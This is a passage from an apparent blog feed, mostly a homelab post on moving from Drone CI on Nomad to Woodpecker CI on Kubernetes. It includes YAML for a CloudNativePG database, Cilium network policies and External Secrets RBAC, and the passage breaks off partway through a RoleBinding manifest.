well. But that still ended up on the rickety pile of Homelab tasks to look at
at some point.</p>
<p>Overall, it was a good migration and allowed me to figure out my DB migration
strategy with a service which I could do without for a couple of days.
I also have to congratulate the Gitea community on their work on the Helm
chart. It was definitely one of the better ones I&rsquo;ve used.</p>
<p>And that&rsquo;s it for today. I can&rsquo;t say what&rsquo;s going to be next on the migration
list, as I haven&rsquo;t decided yet. I first thought to migrate my IoT services,
Mosquitto, zigbee2mqtt and friends, but I&rsquo;d also like to tackle some of the
bigger items, like Nextcloud. On the other hand, I&rsquo;m really not looking forward
to touching my Nextcloud deployment. It has been working so nicely.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 15: Migrating my CI</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-15-ci/</link>
      <pubDate>Sun, 26 Jan 2025 22:50:33 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-15-ci/</guid>
      <description>Migrating my Drone CI install on Nomad to a Woodpecker CI on Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Drone CI setup on Nomad to a Woodpecker CI setup on k8s.</p>
<p>This is part 15 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Finally, another migration blog post! I&rsquo;m still rather happy that I&rsquo;m getting
into it again.
For several years now, I&rsquo;ve been running a CI setup to automate a number of
tasks related to some personal projects. CI stands for <a href="https://en.wikipedia.org/wiki/Continuous_integration">Continuous Integration</a>,
and Wikipedia says this about it:</p>
<blockquote>
<p>Continuous integration (CI) is the practice of integrating source code changes frequently and ensuring that the integrated codebase is in a workable state.</p></blockquote>
<p>I&rsquo;m pretty intimately familiar with the concept on a rather large scale, as I&rsquo;m
working in a CI team at a large company.</p>
<p>In the Homelab, I&rsquo;m using CI for a variety of use cases, ranging from the
traditional automated test cases for software I&rsquo;ve written to just a convenient
automation for things like container image builds. I will go into details on a
few of those use cases later on, when I describe how I&rsquo;ve migrated some of my
projects.</p>
<p>The basic principle of CI for me is: You push a commit to a Git repository,
and a piece of software automatically launches a variety of test jobs. These
can range from unit test jobs, through automated linter runs, to automated
deploys of the updated software.</p>
<h2 id="from-drone-ci-to-woodpecker-ci">From Drone CI to Woodpecker CI</h2>
<p>Since I started running a CI, I&rsquo;ve been using <a href="https://www.drone.io/">Drone CI</a>.
It&rsquo;s a relatively simple CI system, compared to what one could build e.g. with
<a href="https://zuul-ci.org/">Zuul</a>, <a href="https://www.jenkins.io/">Jenkins</a> and <a href="https://www.gerritcodereview.com/">Gerrit</a>.</p>
<p>Drone CI consists of two components: the Drone CI server, which provides webhooks for
the Git forge to call and launches the jobs, and the agents, which take the jobs
and run them. In my deployment on Nomad, I was using the <a href="https://github.com/drone-runners/drone-runner-docker">drone-runner-docker</a>.
It mounts the host&rsquo;s Docker socket into the agent and uses it to launch Docker
containers for each step of the CI pipeline.</p>
<p>It has always worked well for me and mostly got out of my way. So I didn&rsquo;t switch
to <a href="https://woodpecker-ci.org/">Woodpecker CI</a> because of features. There aren&rsquo;t
that many different features anyway, because Woodpecker is a community fork of
Drone CI.
Rather, Drone CI started to have quite a bad smell. What bothered me the most
was that their release notes were basically empty and said things like
&ldquo;integrated UI updates&rdquo;.
Then there&rsquo;s whatever happened after they were bought by Harness. Then there&rsquo;s
the fact that the component which needs to mount your host&rsquo;s Docker socket hasn&rsquo;t
been updated in over a year.</p>
<p>In contrast, Woodpecker is a community project and had a far nicer smell, so I
decided that while I was at it, I would not just migrate Drone to k8s but also
switch to Woodpecker.</p>
<p>One of the things I genuinely looked forward to was the new backend. With the migration
to k8s, I could finally make use of my entire cluster. With Drone&rsquo;s Docker runner,
I always had to reserve a lot of resources for CI job execution on the nodes
where the agents were launched.
Now, with the Kubernetes backend, it doesn&rsquo;t matter (much, more on that later) where
the agents are running - the only thing they do is launch Pods to run each
step of the pipeline, and where those are scheduled is left to Kubernetes.</p>
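<p>To give a rough idea of what that looks like on the agent side, the backend is selected via environment variables. This is only a sketch (variable names as documented by Woodpecker, the namespace is a placeholder), not my actual Deployment:</p>
<pre tabindex="0"><code># Sketch: agent environment for the Kubernetes backend.
env:
  - name: WOODPECKER_BACKEND                # selects the backend implementation
    value: kubernetes
  - name: WOODPECKER_BACKEND_K8S_NAMESPACE  # where the step Pods get created
    value: woodpecker
</code></pre>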
<p>I will go into more detail later, when talking about my CI job migrations,
but let me still give a short example of what I&rsquo;m actually talking about.</p>
<p>Here&rsquo;s a slight variation of the example pipeline from the <a href="https://woodpecker-ci.org/docs/usage/intro">Woodpecker docs</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">branch</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;binary-data-123&#34; &gt; executable</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">a-test-step</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">golang:1.16</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;Testing ...&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./executable</span>
</span></span></code></pre></div><p>This pipeline tells Woodpecker that it should only be run when a Git push is
done to the <code>master</code> branch of the repository. This file would be committed to
the repository it&rsquo;s used in, but there are also options to tell Woodpecker
to listen on events for other repositories. So you could theoretically even have
a separate &ldquo;CI&rdquo; repository with all the pipelines. But that&rsquo;s generally not a
good idea.</p>
<p>The pipeline itself will execute two separate steps, called &ldquo;build&rdquo; and &ldquo;a-test-step&rdquo;.
The <code>image:</code> parameter defines which container image is executed, in this case
Debian and the golang image. And then follows a list of commands to be run.
In this case, they&rsquo;re pretty nonsensical and will lead to failed pipelines,
but they&rsquo;re only here for demonstration purposes anyway. In the Woodpecker web UI,
this is what the pipeline looks like:</p>
<figure>
    <img loading="lazy" src="first_run.png"
         alt="A screenshot of the Woodpecker web UI. It is separated into two main areas. The left one shows an overview of the pipeline and its steps. At the top left, it shows that the pipeline was launched by a push from user mmeier. Below that follows the list of steps, showing in order: clone, build, a-test-step. Both clone and build have a green check mark next to them, while a-test-step has a red X. The a-test-step step is also highlighted. On the right side, a window header &#39;Step Logs&#39; shows the logs from the a-test-step execution. It starts out echoing the string &#39;Testing ...&#39;, followed by &#39;/bin/sh: 18: ./executable: Permission denied&#39;."/> <figcaption>
            <p>Screenshot of my first Woodpecker CI pipeline execution.</p>
        </figcaption>
</figure>

<h2 id="database-deployment">Database deployment</h2>
<p>To begin with, Woodpecker needs a bit of infrastructure set up, namely a
Postgres database. Smaller deployments can also run on SQLite; I&rsquo;m using
Postgres mostly out of habit.</p>
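<p>For completeness, the server is pointed at that database via environment variables, roughly like this. A sketch with placeholder credentials; the <code>-rw</code> Service name follows CNPG&rsquo;s naming for the Cluster defined below:</p>
<pre tabindex="0"><code># Sketch: Woodpecker server database settings (placeholder values).
env:
  - name: WOODPECKER_DATABASE_DRIVER
    value: postgres
  - name: WOODPECKER_DATABASE_DATASOURCE
    value: postgres://woodpecker:CHANGEME@woodpecker-pg-cluster-rw:5432/woodpecker?sslmode=disable
</code></pre>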
<p>As I&rsquo;ve <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">written about before</a>,
I&rsquo;m using <a href="https://cloudnative-pg.io/">CloudNativePG</a> for my Postgres DB needs.
In the recent <a href="https://cloudnative-pg.io/documentation/1.25/release_notes/v1.25/">1.25 release</a>,
CNPG introduced support for creating multiple databases in a single Cluster.
But because I&rsquo;ve already started with &ldquo;one Cluster per app&rdquo;, I decided to stay
with that approach for the duration of the k8s migration and look into merging
it all into one Cluster later.</p>
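<p>For reference, the new mechanism is a separate <code>Database</code> object that points at an existing Cluster. A rough sketch based on the CNPG 1.25 docs, with placeholder names:</p>
<pre tabindex="0"><code># Sketch: declarative database creation in CNPG 1.25 (placeholder names).
apiVersion: postgresql.cnpg.io/v1
kind: Database
metadata:
  name: woodpecker-db
spec:
  name: woodpecker          # database to create
  owner: woodpecker         # role owning the database
  cluster:
    name: shared-pg-cluster # existing CNPG Cluster to create it in
</code></pre>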
<p>Because I&rsquo;ve written about it in detail before, here are just the basic options
for the CNPG Cluster CRD I&rsquo;m using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-woodpecker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-woodpecker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span></code></pre></div><p>As always, I&rsquo;m configuring backups right away.
For CNPG to work, the operator needs network access to the Postgres instance
started up in the Woodpecker namespace, so a network policy is also needed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>While we&rsquo;re on the topic of network policies, here&rsquo;s my generic deny-all
policy I&rsquo;m using in most namespaces:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span></code></pre></div><p>This allows all intra-namespace access between Pods, but no ingress from any
Pods in other namespaces.</p>
<p>And because Woodpecker provides a web UI, I also need to provide access to the
<code>server</code> Pod from my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-traefik-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;server&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>Hm, writing all of this up I&rsquo;m realizing that I completely forgot to write a
post about some &ldquo;standard things&rdquo; I will be doing for most apps. I had planned
to do that for the migration of my Audiobookshelf instance to k8s, but
completely forgot to write any post about it at all. Will put it on the pile. &#x1f604;</p>
<p>Before getting to the Woodpecker Helm chart, we also need to do a bit of
yak shaving with regards to the CNPG DB secrets. Helpfully, CNPG always
creates a secret with the necessary credentials to access the database,
in multiple formats. An example would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://woodpecker-pg-cluster-rw.woodpecker:5432/woodpecker?password=1234&amp;user=woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">1234</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-rw:5432:woodpecker:woodpecker:1234</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://woodpecker:1234@woodpecker-pg-cluster-rw.woodpecker:5432/woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>I would love to use the values from that Secret verbatim, specifically
the <code>uri</code> property, to set the <code>WOODPECKER_DATABASE_DATASOURCE</code> variable from
it. But sadly, the <a href="https://github.com/woodpecker-ci/helm">Woodpecker Helm chart</a>
is one of those charts which allow Secrets to be used to set environment variables,
but only via <code>envFrom.secretRef</code>. That feeds all of the Secret&rsquo;s keys in as env
variables, but doesn&rsquo;t allow assigning specific env variables to specific keys
from the Secret via <code>env.valueFrom.secretKeyRef</code>.</p>
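<p>To illustrate the difference, here&rsquo;s a minimal sketch of the two mechanisms on a
plain Kubernetes container spec. This is not taken from the chart, just a generic
fragment: the container name and image are made up, while the Secret names are the
ones used further down in this post:</p>
<pre tabindex="0"><code>containers:
  - name: example
    image: docker.io/library/alpine:3.21
    # envFrom: every key of the Secret becomes an env variable,
    # named exactly like the key
    envFrom:
      - secretRef:
          name: woodpecker-db-secret
    # env.valueFrom: one specific env variable is filled from one
    # specific key of a Secret, regardless of what the key is called
    env:
      - name: WOODPECKER_DATABASE_DATASOURCE
        valueFrom:
          secretKeyRef:
            name: woodpecker-pg-cluster-app
            key: uri
</code></pre>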
<p>I think this is functionality every Helm chart should provide, specifically for
cases like this. I&rsquo;ve got two tools which automatically create Secrets in my
cluster: CNPG for DB credentials and configs, and Rook, which creates Secrets and
ConfigMaps for S3 buckets and Ceph users created through its CRDs.
But every tool and Helm chart seems to have its own ideas about which env variables
certain things should be stored in. The S3 credential env vars in the case of
Rook&rsquo;s S3 buckets should work in most cases because they&rsquo;re pretty standardized,
but everything else is pretty much hit-and-miss.</p>
<p>And, with the <code>env.valueFrom</code> functionality for both Secrets and ConfigMaps,
Kubernetes already provides the necessary utility to assign specific keys from
them to specific env vars. A number of Helm charts just need to allow me to
make use of that, instead of insisting on Secrets with a specific group of keys.</p>
<p>Anyway, in the case of Secrets, I&rsquo;ve found a pretty roundabout way to achieve
what I want, namely being able to use automatically created credentials.
And I&rsquo;m using my <a href="https://external-secrets.io/latest/">External Secrets</a>
deployment for this, more specifically the ability to configure a Kubernetes
namespace as a SecretStore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secrets-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteNamespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">selfsubjectrulesreviews</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
